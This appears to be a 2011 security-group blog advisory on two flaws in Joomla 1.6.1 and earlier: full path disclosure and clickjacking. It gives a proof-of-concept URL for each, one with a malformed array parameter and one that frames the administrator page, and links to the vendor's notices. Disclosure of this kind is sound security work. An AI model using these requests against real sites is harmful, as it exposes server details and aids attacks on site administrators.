Skip to main content

Search This Blog

YGN Ethical Hacker Group Blog

Updates about YGN Ethical Hacker Group's Activities

Joomla! 1.6.1 and lower | Information Disclosure & ClickJacking vulnerabilities

Get link
Facebook
X
Pinterest
Email
Other Apps

By YGN Ethical Hacker Group - April 19, 2011

Information Disclosure > Full Path

Proof-of-Concept:
http://attacker.in/joomla161/index.php?Itemid[]=

ClickJacking

Proof-of-Concept:
http://yehg.net/lab/pr0js/pentest/cross_site_framing.php?url=http://attacker.in/joomla161/administrator

Vendor References:
http://developer.joomla.org/security/news/347-20110409-core-clickjacking.html
http://developer.joomla.org/security/news/341-20110402-core-information-disclosure.html

Get link
Facebook
X
Pinterest
Email
Other Apps

Powered by Blogger

Archive

2023 1
- April 2023 1

2021 2
- September 2021 1
- May 2021 1
2020 12
2019 5
2018 4
2017 1
- December 2017 1
2016 4
- November 2016 2
- March 2016 2
2015 1
- June 2015 1
2014 2
- December 2014 2
2013 13
2012 47
2011 59
2010 21
2009 82
2007 1
- March 2007 1

Show more Show less

Labels

advisories
exploits
interviews
misc
papers
presentations
security
talent-highlights
tools
trainings

updates

Show more Show less